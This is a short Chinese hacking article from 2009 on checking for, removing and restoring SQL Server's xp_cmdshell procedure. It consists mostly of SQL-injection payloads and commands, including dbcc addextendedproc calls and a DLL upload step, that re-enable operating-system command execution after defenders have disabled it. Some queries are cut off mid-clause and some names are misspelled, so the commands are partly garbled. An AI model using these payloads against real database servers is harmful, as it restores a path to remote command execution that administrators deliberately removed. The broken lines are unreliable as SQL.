恢复xpcmdshell:xp_cmdshell的删除及恢复

阅读：198次   时间：2009-09-11 16:28:07   字体：[大 中 小]

文章来源:老蔡家

、xp_cmdshell删除及恢复
1、判断xp_cmdshell是否存在
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')

select count(*) from master.dbo.sysobjects where xtype='x' and
返回结果为1就ok

2、恢复xp_cmdshell思路方法
删除扩展存储过过程xp_cmdshell语句
exec sp_dropextendedproc 'xp_cmdshell'

恢复cmdshellsql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and
返回结果为1就ok

否则需上传c:\inetput\web\xplog70.dll后
exec master.dbo.sp_addextendedproc 'xp_cmdshell',’c:\inetput\web\xplog70.dll’;--

如果是用以下思路方法删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

则可以用以下语句恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
这样可以直接恢复不用去管sp_addextendedproc是不是存在

上篇文章: 谈环境变量在Hacking中利用